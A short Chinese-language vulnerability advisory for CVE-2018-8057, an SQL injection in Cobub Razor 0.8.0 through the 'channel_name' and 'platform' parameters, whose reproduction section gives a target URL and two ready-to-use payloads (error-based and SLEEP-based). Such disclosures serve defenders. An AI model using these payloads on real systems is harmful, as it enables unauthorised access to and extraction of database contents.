# (CVE-2018-8057)Cobub Razor 0.8.0 存在SQL注入漏洞
==========
一、漏洞简介
————
Cobub Razor
0.8.0存在SQL注入漏洞,”/application/controllers/manage/channel.php”页面的”channel\_name”及”platform”参数过滤不严格导致存在SQL注入漏洞。Cobub
Razor是一个在github上开源的系统,漏洞发现者已经将漏洞信息通过[issues](https://github.com/cobub/razor/issues/162)告知作者。
二、漏洞影响
————
Cobub Razor 0.8.0
三、复现过程
————
### POC
> http://www.0-sec.org/index.php?/manage/channel/addchannel
> POST data:
> 1.channel_name=test” AND (SELECT 1700 FROM(SELECT COUNT(*),CONCAT(0x7171706b71,(SELECT (ELT(1700=1700,1))),0x71786a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)– JQon&platform=1
> 2.channel_name=test” AND SLEEP(5)– NklJ&platform=1
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容